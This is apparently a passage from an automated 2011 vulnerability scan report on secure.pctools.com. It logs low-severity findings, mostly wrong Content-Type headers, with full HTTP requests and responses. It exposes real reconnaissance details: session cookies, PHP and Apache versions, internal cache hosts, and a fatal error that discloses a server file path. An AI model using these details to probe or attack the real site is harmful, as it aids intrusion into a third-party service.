Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /authenticate/auth.php

Request

GET /authenticate/auth.php?v=getiav HTTP/1.1
Host: secure.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671918|PC#1300668855394-755649.17#1301879658|check#true#1300670118; ccheck=deleted; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; __qca=P0-78397944-1300668861448;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/4.4.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Content-Type: text/plain; charset=UTF-8
X-Cache-Lookup: MISS from www6.pctools.com:8080
Date: Mon, 21 Mar 2011 01:14:15 GMT
Content-Length: 14
Connection: close

iav_offered=0;

8.2. https://secure.pctools.com/res/ajax/newsletter.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /res/ajax/newsletter.php

Request

GET /res/ajax/newsletter.php?email= HTTP/1.1
Host: secure.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671918|PC#1300668855394-755649.17#1301879658|check#true#1300670118; ccheck=deleted; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; __qca=P0-78397944-1300668861448;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/4.4.8
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www6.pctools.com:8080
Date: Mon, 21 Mar 2011 01:13:56 GMT
Content-Length: 166
Connection: close

E-mail address cannot be blank. Please provide a valid e-mail address in the form <i>username@isp.com</i>, if you are an AOL user please enter your ScreenName@aol.com

9. Content type incorrectly stated  previous
There are 5 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


9.1. https://secure.pctools.com/registry-mechanic/payment/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://secure.pctools.com
Path:   /registry-mechanic/payment/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /registry-mechanic/payment/ HTTP/1.1
Host: secure.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671918|PC#1300668855394-755649.17#1301879658|check#true#1300670118; ccheck=deleted; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; __qca=P0-78397944-1300668861448;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/4.4.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Cache-Lookup: MISS from www3.pctools.com:8080
Date: Mon, 21 Mar 2011 01:14:09 GMT
Content-Length: 173
Connection: close

<br />
<b>Fatal error</b>: Call to a member function on a non-object in <b>/home/pctools/webapp/modules/Components/actions/MBoxAction.class.php</b> on line <b>26</b><br />

9.2. https://secure.pctools.com/res/ajax/newsletter.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://secure.pctools.com
Path:   /res/ajax/newsletter.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /res/ajax/newsletter.php?email= HTTP/1.1
Host: secure.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671918|PC#1300668855394-755649.17#1301879658|check#true#1300670118; ccheck=deleted; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; __qca=P0-78397944-1300668861448;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/4.4.8
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www6.pctools.com:8080
Date: Mon, 21 Mar 2011 01:13:56 GMT
Content-Length: 166
Connection: close

E-mail address cannot be blank. Please provide a valid e-mail address in the form <i>username@isp.com</i>, if you are an AOL user please enter your ScreenName@aol.com

9.3. https://secure.pctools.com/res/js/uniqueid.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://secure.pctools.com
Path:   /res/js/uniqueid.php

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /res/js/uniqueid.php HTTP/1.1
Host: secure.pctools.com
Connection: keep-alive
Referer: https://secure.pctools.com/myaccount/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; __qca=P0-78397944-1300668861448; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300669873828-New%7C1321405873828%3B%20event69%3Devent69%7C1321405873830%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671785|PC#1300668855394-755649.17#1301879525|check#true#1300669985

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/4.4.8
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 21 Mar 2011 01:11:16 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/plain; charset=UTF-8
X-Cache-Lookup: MISS from www5.pctools.com:8080
Date: Mon, 21 Mar 2011 01:11:16 GMT
Connection: keep-alive
Set-Cookie: ccheck=deleted; expires=Sun, 21 Mar 2010 01:11:15 GMT; path=/; domain=.pctools.com
Content-Length: 111

var uniqueID = "071299204246230163";
var s_campaign = "";
var s_prop1 = "";
var cb = 177246278;
var cd = 85714;

9.4. https://secure.pctools.com/spyware-doctor-antivirus/payment/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://secure.pctools.com
Path:   /spyware-doctor-antivirus/payment/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /spyware-doctor-antivirus/payment/ HTTP/1.1
Host: secure.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671918|PC#1300668855394-755649.17#1301879658|check#true#1300670118; ccheck=deleted; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; __qca=P0-78397944-1300668861448;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/4.4.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Cache-Lookup: MISS from www4.pctools.com:8080
Date: Mon, 21 Mar 2011 01:14:04 GMT
Content-Length: 173
Connection: close

<br />
<b>Fatal error</b>: Call to a member function on a non-object in <b>/home/pctools/webapp/modules/Components/actions/MBoxAction.class.php</b> on line <b>26</b><br />

9.5. https://secure.pctools.com/spyware-doctor/payment/  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   https://secure.pctools.com
Path:   /spyware-doctor/payment/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /spyware-doctor/payment/ HTTP/1.1
Host: secure.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671918|PC#1300668855394-755649.17#1301879658|check#true#1300670118; ccheck=deleted; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; __qca=P0-78397944-1300668861448;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/4.4.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Cache-Lookup: MISS from www5.pctools.com:8080
Date: Mon, 21 Mar 2011 01:14:02 GMT
Content-Length: 173
Connection: close

<br />
<b>Fatal error</b>: Call to a member function on a non-object in <b>/home/pctools/webapp/modules/Components/actions/MBoxAction.class.php</b> on line <b>26</b><br />

Report generated by XSS.CX at Sun Mar 20 20:21:00 CDT 2011.